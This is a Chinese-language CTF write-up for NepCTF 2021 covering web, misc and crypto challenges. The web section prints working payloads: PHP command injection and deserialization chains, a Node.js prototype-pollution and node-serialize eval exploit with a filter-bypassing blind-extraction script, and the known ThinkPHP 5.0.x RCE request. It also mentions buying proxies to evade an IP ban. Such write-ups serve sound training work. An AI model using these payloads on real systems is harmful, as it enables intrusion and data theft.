Nepnep2021

队伍名

Y4摸鱼来玩

排名第四

web

little_trick

方法一

看到限制条件那么长直接想到php反引号可以执行命令，配合文件有读写权限即可做出来

1	http://ea2e7981-2ed4-463d-a132-f90cf546479d.node1.hackingfor.fun/1b5337d0c8ad813197b506146d8d503d/?nep=`cat n*>1`;&len=99

之后访问

1	http://ea2e7981-2ed4-463d-a132-f90cf546479d.node1.hackingfor.fun/1b5337d0c8ad813197b506146d8d503d/1

方法二

结合一个小trick，由于都是字母，linux下文件系统排序是数字优先，之后是abcd。。。的字母顺序

因此我们执行

`>cat`

之后文件目录结构应该是这样的

1	cat nepxxx.php indxx,php

结合一个trick星号

1	`*>1`等价于 cat nepxxx.php indxx,php >1从而得到flag

bbxhh_revenge

非预期

发现banIP我直接花十块钱买了代理，我太坏了嘿嘿，第一次传imagin让我继续传nepnep之后让我postHuaiNvRenPaPaPa

最后发现flag就在phpinfo里面

1
2
3

http://node4.hackingfor.fun:32320/index.php?nepnep=phpinfo();&imagin=system("ls");
post
HuaiNvRenPaPaPa=1

后来比赛结束发现好像改题了，hhh那算是白给我一个flag

预期(还没做出)

后来写wp的时候发现似乎被修复了，还没研究出来，先冲其他题

easy_tomcat（没做出来）

放点在其中发现的小思路

发现登录注册功能，尝试头像处目录穿越失败，通过猜测得到三个路由index.jsp register.jsp admin.jsp

尝试tomcat经典漏洞

http://500c7619-aa62-4b0d-90a8-6ad219cc014d.node5.hackingfor.fun/examples/servlets/servlet/SessionExample

发现没用嘻嘻

后来做出来了看我csdn

梦里花开牡丹亭

首先题目一进去就给了源代码，简单的分析一下

首先是Game类，有个wakeup和destruct方法，里面有个21232f297a57a5a743894a0e4a801fc3，在线解密得到是admin

通过简单分析很容易得出应该是利用shell($content);去执行任意命令，因为waf.txt的存在只能调用file_get_contents函数，因此我们读一下shell.php的

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='shell';
        $this->content='phpinfo();';
        $this->register = 'admin';
        $this->file=new Open();
    }

}
class Open{

}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));

要删除waf.txt只能想到原生类了查找能有删除功能函数，盲猜带open

<?php
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__wakeup',
            '__call',
            '__callStatic',
            'open'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }
}

得到ZipArchive刚好符合，可以删除waf.txt

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;

    public  $file;
    public  $filename;
    public  $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='waf.txt';
        $this->content=8;
        $this->register = 'admin';
        $this->file=new ZipArchive();
    }



}
class Open{

}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));

然后就可以执行任意命令

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;

    public  $file;
    public  $filename;
    public  $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='shell';
        $this->content='ls /';
        $this->register = 'admin';
        $this->file=new Open();
    }



}
class Open{
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
//            shell($content);
        }else{
            echo file_get_contents($filename.".php");
        }
    }
}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));

通过php /flag绕过过滤hhh

gamejs

首先看到名字我们不难想到是nodejs，常规套路是拼接source拿到源代码，发现三个路由

1
2
3

app.post('/record', record);
app.get('/', index);
app.get('/source', function (req, res)

然后我一眼看到了最上面有一个merge函数，肯定有原型污染

index页面是那个游戏，没啥好分析的

source页面更不用说了

那就只剩一个record路由了

1	var score = req.body.score;

通过post传入数据，配合原型污染用application/json格式的，既然用了json格式，那么下一行的绕过更简单了

1	score.length < String(highestScore).length

因此我们传入，即可绕过了，其实也可以数组绕过，但是不好配合原型污染

1	{"score": xxxx, "length": 1}}

之后看下一行，先放在一边

1
2
3

merge(record, {
lastScore:score,
maxScore:Math.max(parseInt(score),record.maxScore),lastTime: new Date().toString()});

再往下，猜测要执行关键函数unserialize，因此必须绕过这个if，不过我们传入的是json数据自带绕过，以为结果是NaN因此直接绕过了hhh

if ((score - highestScore) < 0) {
                var banner = "不好，没有精神！";
            } else {
                var banner = unserialize(serialize_banner).banner;
            }

我们再看unserialize函数这里有一个eval函数可以命令执行

if (validCode(func_code)){
            var d = '(' + func_code + ')';
            obj[key] = eval(d);
          }

再跟踪validCode函数发现只是过滤明文，这里可以十六进制绕过

var validCode = function (func_code){
    let validInput = /subprocess|mainModule|from|buffer|process|child_process|main|require|exec|this|eval|while|for|function|hex|char|base64|"|'|\[|\+|\*/ig;
    return !validInput.test(func_code);
};
var validInput = function (input) {
    let validInput = /subprocess|mainModule|from|process|child_process|main|require|exec|this|function|buffer/ig;
    ins = serialize(input);
    return !validInput.test(ins);
};

因此构造类似这样即可，简单分析可知需要套两层__proto__进去

1	{"score": {"__proto__": {"__proto__": {"jrxnm": "_$$ND_FUNC$$XXXPAYLAOD"}}, "length": 1}}

因为没有回显，这里采用报错方式配合二分法获得flag

a = '69662870726f636573732e6d61696e4d6f64756c652e726571756972652822667322292e7265616446696c6553796e6328222f6574632f70617373776422292e746f537472696e6728295b305d3e227a22297b7d656c73657b7468726f77204572726f7228297d'
res =""
for i in range(0,len(a),2):
    res += "\\\\x"+a[i:i+2]
print(res)

明天抽时间写

import requests
import time
import string
import json

url = "http://467df204-a224-4b61-8ae6-48637aa91cee.node5.hackingfor.fun/record"


def deco(idx, c):
    p = ''.join(['\\x' + hex(ord(i))[2:] for i in
                 f'if(process.mainModule.require("child_process").execSync("cat /flag").toString()[{idx}]>"{c}"){{}}else{{throw Error()}}']);
    r = {"score": {"__proto__": {"__proto__": {"banner1": "_$$ND_FUNC$$_``.constructor.constructor(`" + p + "`)()"}},
                   "length": 1}}
    return r


flag = ''
for i in range(0, 1000):
    max = 127
    min = 32
    while max >= min:
        # print(str(max)+"-------"+str(min))
        mid = (max + min) // 2
        r = requests.post(url, json=deco(i, chr(mid)))
        if "broke" not in r.text:
            min = mid + 1
        else:
            max = mid
        if max == mid == min:
            flag += chr(mid)
            print(flag)
            break
        if '}' in flag[:-1]:
            exit()

faka_revenge

拿到附件，发现是thinkphp，一开始以为是后台啥的，但是md5在线破解失败

然后全局搜索THINK_VERSION得到版本号5.0.14，这么低的版本肯定有RCE可以用

那就简单了，发现禁用了system，调用phpinfo又报错可恶，shell_exec不能用，尝试passthru成功

paylaod

1
2
3

http://e6a43052-fdf4-48f0-85e9-0a6bf6e53aa7.node5.hackingfor.fun/?s=index
然后post数据
_method=__construct&filter[]=passthru&method=GET&get[]=cat /zhangsan*

Misc

签到题

开局一堆0xffff眼睛都麻了，自闭了好久，猜测可能是二维码那种出题，遇到f就给黑色

s='fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffff9fffffffffffffffffffffffffffffff5f0001ffffffffffffffffffffffe000407ffcffffffffffffffffffffff8fffffffff7fffffffffffffffffffff3fffffffff3ffffffffffffffffffffcffffffffffbffffffffffffffffffffdffffffffffbffffffffffffffffffffdffffffffffbfffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffcfffffffffffffffffffffffffffffffcffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000fffffffffffffffffffffffffffe7fff1f9fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe1fffffffffffdffffffffffffffffff8cfffffffffffdfffffffffffffff03fbf7ffffffffffbffffffffffffffe79f3f3ffffffffffbffffffffffffffefde7fbffffffffffbffffffffffffffefeeff9ffffffffffbffffffffffffffefe6ffdffffffffff9ffffffffffffffcff6ffdffffffffffcffffffffffffffdffaffcffffffffffe3fffffffffffffdff8ffefffffffffff800fffffffffffdff9ffefffffffffff0fffffffffffffdffdffeffffffffffc7fffffffffffffdffffff7fffffffff3ffffffffffffffdffffff7fffffffff7ffffffffffffffdffffff7ffffffffffffffffffffffffdfff9fffffffffffffff7fffffffffffffffbfffffffffffffff3fffffffffffffff7ffffffffffffc1fbfffffffffffffff7ffffffffffff9df9fffffffffffffff7ffffffffffffbdfdfffffffffffffff7ffffffffffffbdfdfffffffffffffff9ffffffffffffbdf9fffffffffffffffcffffffffffffbdfbfffffffffffffffe3fffffffffffbdfbfffffffffffffffc007fffffffffbdf3fffffffffffffff1f83fffffffff9df7ffffffffffffffe7ffffffffffffcdcfffffffffffffffefffffffffffffe01ffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffdffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff3fffffffffffffffffffffffffffff3e7ffffffffffffffffffffffffffffc78ffffffffff8ffffffffffffffffffb03fffffffffff3fffffffffffffffff23ffffffffffff87ffffffffffffffff787ffffffffffff0ffffffffffffffff7f9ffffffffffffc7fffffffffffffff7fc7fffffffffff1ffffffffffffffff7ff3ffffffffffc7ffffffffffffffffbffbffffffffff1fffffffffffffffffcffbfffffffffcffffffffffffffffffe7e7ffffffffe1fffffffffffffffffff80fffffffffefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe3fffffffffffffffffffffffffff01f89ffffffffffffffffffffffffffc7cf3cffffffffffffffffffffffffff9fee7efffffffffffffffffffbffffff3ff6fefffffffffffffffffffbffffff7ff2fe7ffffffffffffffffffbffffff7ffaff7ffffffffffffffffffbfffffefff8ff7ffffffffffffffffffbfffffefffcff7ffffffffffffffffffbfffffefffcff3ffffffffffffffffffbfffffefffcffbffffffffffffffffffbfffffeffffffbffffffffffffffffffbffffffffffffbffffffffffffffffffbffffffffffffbffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffc00fffffffffffffffffffffffbfffffbff00001ffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffffffffffffdfcfffffffffffffffffffffffffffffbfefffffffffffffffffffffffffffff3fe7ffffffffffffffffffffffffffff7ff7ffffffffffffffffffffffffffff7ff7ffffffffffffffffffffffffffff7ff7ffffffffffffffffe1ffffffffff7ff7ffffffffffffffff0fffffffffff7ff7fffffffffffffff8ffffffffffff7fefffffffffffffffff3fffffffffff9f0fffffffffffffffffcfffffffffffe07fffffffffffffffffe7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffff7ffffffffffffffffffffffffffffffe7fffffffffffffffffffffffffffffc0fffffffffffffffffffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7ffffffffff8001fffffffffffffffff7ffffffffffbffc00fffffffffffffff7ffffffffff7ffffe1ffffffffffffff7ffffffffff7fffffcffffffffffffff7ffffffffff7fffffe7fffffffffffff7ffffffffff3ffffff3fffffffffffff7ffffffffffbffffffbfffffffffffff7ffffffffff7ffffff3fffffffffffff7ffffffffff83ffffe7fffffffffffff7fffffffffff83fffcffffffffffffff7ffffffffffff80003ffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7ffffffffffbffffffffffffffffffff7ffffffffff9ffffffffffffffffffff7ffffffffffdffffffffffffffffffff7ffffffffffeffffffffffffffffffff7ffffffffffeffffffffffffffffffff7fffffffffff7fffffffffffffffffff7fffffffffff7fffffffffffffffffff7fffffffffffbfffffffffffffffffff7fffffffffff9fffffffffffffffffff7fffffffffffdfffffffffffffffffff7fffffffffffcfffffffffffffffffff7fffffffffffefffffffffffffffffff7fffffffffffe7ffffffffffffffffff7ffffffffffff3ffffffffffffffffff7ffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffff9f003fffffffffffffffffffffffffffc07f83ffffffffffffffffffffffffff9fffffffffff8000001fffffffffffff3fffffffffff3fffffcffffffffffffe7ffffffffffe7fffffe7fffffffffffcfffffffffffcfffffff3fffffffffff9fffffffffffc1ffffff3fffffffffff3fffffffffffe7fffffc7ffffffffffe7ffffffffffff03ffe01fffffffffffdffffffffffffff8000fffffffffffff3ffffffffffffffffffffffffffffffe7ffffffffffffffffffffffffffffff8fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffe03ffffffffffffffffffffffffff7ffcf8fffffffffffbffffffffffffff7ff9fefffffffffff3ffffffffffffff7ff3ff7fffffffffe7ffffffffffffffbff7ffbfffffffffefffffffffffffffbff7ffbfffffffffefffffffffffffffbff7ffdfffffffffeffffffffcffffffbff7ffdfffffffffeffffffffeffffffbff7ffdfffffffffe7fffc0ffeffffffbff7ffcffffffffff3fff9e07effffffbff7ffeffffffffff80017ff80ffffffbff7ffefffffffffffffd7ffffffffff0037ffefffffffffffffc7ffffffffffffc3ffefffffffffffffefffffffffffffffffefffffffffffffefffffffffffffffffcfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe03fffffffffffffffffffffffffffffcf9fffffffffffffffffffffffffffff9fdffffffffffffffff7ffffffffffffbfdffffffffffffffff7ffffffffffffbfcffffffffffffffff7ffffffffffff3feffffffffffffffff7ffffffffffff7feffffffffffffffff7ffffffffffff7feffffffffffffffff7ffffffffffff000000007ffffffffff7ffffffffffffbffffffe7ffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7ffffffffffffffdffffffffffffffff7ffffffffffffffcffffffffffffffff7ffffffffffff07effffffffffffffff7ffffffffffff73effffffffffffffff7ffffffffffff7beffffffffffffffff7ffffffffffff7beffffffffffffffff7ffffffffffff7beffffffffffffffff7ffffffffffff9bcffffffffffffffff7ffffffffffffc3dffffffffffffffff7fffffffffffff01ffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffcfffffffffffffffffffff7fffffffffe1ffffffffffffffffffff7ffffffffffe0fffffffffffffffffff7fffffffffffe07fffffffffffffffff7fffffffffffff00ffffffffffffffff7ffffffffffffffeffffffffffffffff7ffffffffffffff8ffffffffffffffff7fffffffffffffe3ffffffffffffffff7fffffffffffff8ffffffffffffffffffffffffffffffe3fffffffffffffffffffffffffffffe1fffffffffffffffffffffffffffffc0fffffffffffffffffffffffffffffc1ffffffffffffffffffffffffffffffc7fffffffffffffffffffffffffffffff807fffffffffffffffffffffffffffffff01fffffffffffffffffffffffffffffffc07ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
strs=''
for i in s:
    if i=='f':
        strs+=' '
    else:
        strs+='█'
    if len(strs)>=32:
        print(strs)
        strs=''

最后用notepad打开肉眼看半天之差点近视，得到flag，交了半天不对，结果那个中间不是so，是50

出题人日记

先去看看excel里，全选后字体转黑色，在第十八天处可以发现隐藏文字提示rot13，且移动图片后有hint:flag在里面，于是把excel以zip打开，发现注释处有hint

隐写.wf pna fbyir guvf ceboyrz

用rot13，有

先常规stegsolve试试，发现alpha通道的0，1，2，3处存在数据，不过没什么思路，于是去试试寻找隐写.js

google搜索隐写.js，没找到，换成英文搜，发现

第二个中有

打开对应在线环境

http://www.peter-eigenschink.at/projects/steganographyjs/showcase/，把蓝色娃娃图片丢进去得到flag

冰峰历险记

拿到exe，玩了几下，发现要输入flag(Nep{}格式)，先拖入ida看了看，没发现什么，后来发现View里存在develop er tools选项，打开发现是chrome的开发者工具…查看源码，发现

那就re它呗，func的作用其实就是返回_0x3771[input-0xa9]的值，后面又对0x3771进行了一些操作，可以不管，if处的判断我们可以发现\x7d是’}’，即直接输出等号右边的字符串即可

function onButtonClick () {

    var _0x3771=['\x62\x6c\x65','\x72\x61\x74\x75','\x33\x39\x46\x32','\x31\x4c\x49\x4a\x76\x65\x68','\x32\x33\x6e\x79\x4f\x53\x75\x6d','\x31\x36\x4d\x42\x73\x69\x7a\x6d','\x34\x64\x4d\x50\x73\x48\x53','\x2d\x31\x44\x45','\x37\x33\x32\x39\x34\x56\x55\x4d\x52\x78\x52','\x34\x41\x45\x31','\x31\x31\x36\x31\x38\x38\x37\x55\x50\x47\x44\x6c\x68','\x33\x36\x30\x39','\x66\x6f\x6e\x74','\x38\x44\x43\x33','\x53\x69\x7a\x65','\x36\x44\x36\x2d','\x43\x6f\x6e\x67','\x32\x33\x6b\x63\x4d\x7a\x4b\x65','\x45\x35\x35\x38','\x31\x35\x36\x35\x32\x35\x64\x50\x66\x52\x45\x49','\x73\x74\x79\x6c','\x6c\x61\x74\x69','\x35\x63\x42\x4c\x49\x4e\x5a','\x35\x35\x37\x33\x39\x68\x72\x6d\x41\x73\x6c','\x4e\x65\x70\x7b','\x36\x38\x38\x35\x38\x68\x6e\x55\x50\x43\x74','\x31\x30\x39\x39\x36\x31\x68\x43\x6f\x45\x6e\x79','\x76\x69\x73\x69','\x6f\x6e\x73\x21','\x34\x36\x30\x35\x31\x46\x66\x61\x70\x4f\x49','\x74\x65\x78\x74'];var _0x336e=function(_0x8710fc,_0xbfc9ff){_0x8710fc=_0x8710fc-0xa9;var _0x377162=_0x3771[_0x8710fc];return _0x377162;};var _0x422051=_0x336e;(function(_0x5ea0a5,_0x23a2f6){var _0x4b1718=_0x336e;while(!![]){try{var _0x13718d=parseInt(_0x4b1718(0xb3))*-parseInt(_0x4b1718(0xbb))+-parseInt(_0x4b1718(0xb9))*parseInt(_0x4b1718(0xc4))+-parseInt(_0x4b1718(0xac))+-parseInt(_0x4b1718(0xc7))*-parseInt(_0x4b1718(0xbc))+parseInt(_0x4b1718(0xaa))*parseInt(_0x4b1718(0xc5))+parseInt(_0x4b1718(0xbf))*parseInt(_0x4b1718(0xc6))+parseInt(_0x4b1718(0xb5))*parseInt(_0x4b1718(0xb8));if(_0x13718d===_0x23a2f6)break;else _0x5ea0a5['push'](_0x5ea0a5['shift']());}catch(_0x2f82a9){_0x5ea0a5['push'](_0x5ea0a5['shift']());}}}(_0x3771,0xcdfa7));
    console.log(_0x422051(0xba)+_0x422051(0xc3)+_0x422051(0xab)+_0x422051(0xa9)+'\x42\x2d\x34\x39'+'\x33\x31\x2d\x41'+_0x422051(0xb1)+_0x422051(0xad)+_0x422051(0xaf)+_0x422051(0xb4)+'\x7d')

}
onButtonClick()

我是间谍2nd

坏女人往我的u盘里偷偷放了一个程序，你能找出她干了什么吗？remember: try to forgery ip,but not to reverse it.

我之前想的是覆盖程序ip到公网，眼睛瞎了，自动忽略英文

，后来改一下本机ip地址开一个nc监听即可，手动敲回车拿flaghhhh

得到Nep{XVlBzgbaiCMRAjWwhTHctcuAxhxKQFDaFpLSjFbcXoEF}

我没有py

volatility，imageinfo发现是win7的，于是

> volatility -f WIN-MREMF575OV9-20210317-081823.raw --profile=Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0xfffffa800418eb30:WeChat.exe                       2468   2828      0 ------ 2021-03-17 07:48:18 UTC+0000
. 0xfffffa8001cec060:WeChat.exe                      1152   2468     44    825 2021-03-17 08:10:24 UTC+0000
.. 0xfffffa8001eb8320:wechatweb.exe                  3036   1152      6    165 2021-03-17 08:10:24 UTC+0000
.. 0xfffffa8003bf7060:WeChatApp.exe                  2224   1152     49    568 2021-03-17 08:11:37 UTC+0000
 0xfffffa80018cd630:wininit.exe                       404    340      3     76 2021-03-17 06:50:12 UTC+0000
. 0xfffffa8003a01910:services.exe                     476    404      9    217 2021-03-17 06:50:12 UTC+0000
.. 0xfffffa800210a810:svchost.exe                    1452    476      4     69 2021-03-17 07:27:29 UTC+0000
.. 0xfffffa8003e8c060:vmtoolsd.exe                   1496    476     11    271 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8003fb78f0:msdtc.exe                       664    476     12    147 2021-03-17 06:50:19 UTC+0000
.. 0xfffffa8003b5d740:svchost.exe                     772    476     19    500 2021-03-17 06:50:13 UTC+0000
... 0xfffffa8001ce13b0:audiodg.exe                   2148    772      5    136 2021-03-17 07:57:49 UTC+0000
.. 0xfffffa8003cae320:spoolsv.exe                    1060    476     12    262 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003bc3b30:svchost.exe                     936    476     38   1022 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003cf8200:svchost.exe                    1116    476     18    318 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003c1bb30:svchost.exe                     304    476     15    472 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa800196f250:sppsvc.exe                     2696    476      4    152 2021-03-17 06:52:16 UTC+0000
.. 0xfffffa8003b25060:vm3dservice.ex                  696    476      3     44 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003d8ab30:taskhost.exe                   1216    476      9    210 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8003e656b0:svchost.exe                    2400    476     13    221 2021-03-17 06:51:15 UTC+0000
.. 0xfffffa8001cafb30:PresentationFo                 3012    476      6    153 2021-03-17 07:10:18 UTC+0000
.. 0xfffffa8003c18b30:svchost.exe                     204    476     26    564 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003b3a740:svchost.exe                     720    476      8    288 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003aaeb30:svchost.exe                     632    476     11    366 2021-03-17 06:50:13 UTC+0000
... 0xfffffa8003b8e270:WmiPrvSE.exe                  1212    632     10    211 2021-03-17 06:50:16 UTC+0000
.. 0xfffffa8003de9b30:VGAuthService.                 1368    476      3     82 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8003f778e0:SearchIndexer.                 2212    476     13    713 2021-03-17 06:50:20 UTC+0000
.. 0xfffffa8001ed4060:svchost.exe                    1980    476     13    320 2021-03-17 07:46:53 UTC+0000
.. 0xfffffa8003bbf890:svchost.exe                     880    476     13    314 2021-03-17 06:50:13 UTC+0000
... 0xfffffa8003e0b3c0:dwm.exe                       1400    880      3     72 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8004041b30:svchost.exe                    1908    476      6     91 2021-03-17 06:50:16 UTC+0000
.. 0xfffffa800413b2f0:vds.exe                        2812    476     13    142 2021-03-17 07:26:53 UTC+0000
. 0xfffffa8003a095a0:lsass.exe                        484    404      7    595 2021-03-17 06:50:12 UTC+0000
. 0xfffffa8003a0d5f0:lsm.exe                          492    404     10    154 2021-03-17 06:50:12 UTC+0000
 0xfffffa8003783060:csrss.exe                         352    340      9    460 2021-03-17 06:50:12 UTC+0000
 0xfffffa80018bab30:System                              4      0     93    598 2021-03-17 06:50:10 UTC+0000
. 0xfffffa8002c899f0:smss.exe                         264      4      2     29 2021-03-17 06:50:10 UTC+0000
 0xfffffa800367b910:csrss.exe                         412    396     10    447 2021-03-17 06:50:12 UTC+0000
. 0xfffffa8002d79ad0:conhost.exe                     2476    412      2     60 2021-03-17 08:18:23 UTC+0000
 0xfffffa8003a10060:winlogon.exe                      504    396      5    116 2021-03-17 06:50:12 UTC+0000
 0xfffffa8003e292d0:explorer.exe                     1428   1336     38   1156 2021-03-17 06:50:14 UTC+0000
. 0xfffffa8003ee2b30:vmtoolsd.exe                    1584   1428      9    250 2021-03-17 06:50:15 UTC+0000
. 0xfffffa8001ab1660:mmc.exe                         1836   1428      7    347 2021-03-17 07:26:52 UTC+0000
. 0xfffffa8002a1bb30:DumpIt.exe                      2932   1428      2     45 2021-03-17 08:18:23 UTC+0000
. 0xfffffa8001ec2060:VeraCrypt.exe                   2260   1428      5    376 2021-03-17 07:16:39 UTC+0000
. 0xfffffa8003e69b30:vm3dservice.ex                  1576   1428      2     53 2021-03-17 06:50:15 UTC+0000
 0xfffffa8001bde440:WeChat.exe                        296    596      0 ------ 2021-03-17 07:07:40 UTC+0000

发现wechat应用，猜测py过程是通过wechat进行，dump一下wechat，在pid=1152处的wechat的dmp文件里搜索Nep{ 得到flag

[

Crypto

Real_Base

做完发现自己好傻，直接python双向队列一下就能出替换表，下次一定！！！

先反向推测b_char

def encode(s,res):
    # res = ''
    binstr = [bin(ord(s[i])).replace('0b', '').zfill(8) for i in range(len(s))]
    p1 = len(binstr) // 3
    p2 = len(binstr) % 3
    part1 = binstr[0:3 * p1]

    for i in range(p1):
        str_p1 = binstr[i * 3] + binstr[i * 3 + 1] + binstr[i * 3 + 2]
        tmp_str = [str_p1[x: x + 6] for x in [0, 6, 12, 18]]
        for n in range(len(tmp_str)):
            num=n+4*i
            b_char[int(tmp_str[n],2)]=res[n+4*i]
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]
        # res += ''.join(tmp_res)

    if p2:
        part2 = binstr[3 * p1:]
        str_p2 = ''.join(part2) + (3 - p2) * '0' * 8
        tmp_str = [str_p2[x: x + 6] for x in [0, 6, 12, 18]][:p2 + 1]
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]
        # res += ''.join(tmp_res)
        # res += '=' * (3 - p2)
    print(b_char)
    return res

得到

1
2

['', 'b', 'c', 'd', 'e', 'f', '', 'h', '', 'j', '', '', '', 'n', '', '', '', 'r', '', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '', '2', '3', '4', '', '', '7', '', '9', 'A', 'B', 'C', 'D', '', '', '', '', '', 'J', '', 'L', '', 'N', 'O', 'P', 'Q', '', '', 'T', 'U', 'V', '', '', '', 'Z', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']

显然是改了base64原来的编码表

从而再换回原来的位置，base64解密得到flag

import base64
basestr='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
newstr='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'
res='tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ='
b64s=''
for i in res:
    for n in range(len(newstr)):
        if newstr[n]==i:
            b64s+=basestr[n]
            break
print(b64s)
print(base64.b64decode(b64s+'='))

你们一天天的不写代码，难道是在等爱情吗

有图片

根据

小银、小盲、小精、小跳….

猜测是

标准银河字母，盲文字母，跳舞小人….

实际上有

标准银河字母，盲文字母，盲文数字，跳舞小人，变形猪圈,猪圈…

对应解密得到:

大kO_TJw}r{1小小大Wa$v0v!?c@bvUm?

有几个没有找到，不过暂时先不管

W型栅栏，栏数为3，得到

大rc{k1@小O小b大_WvaT$UvJ0mvw!??}

可以猜测rc->ep，凯撒密码得到

大ep{x1@小B小o大_JinG$HiW0zij!??}

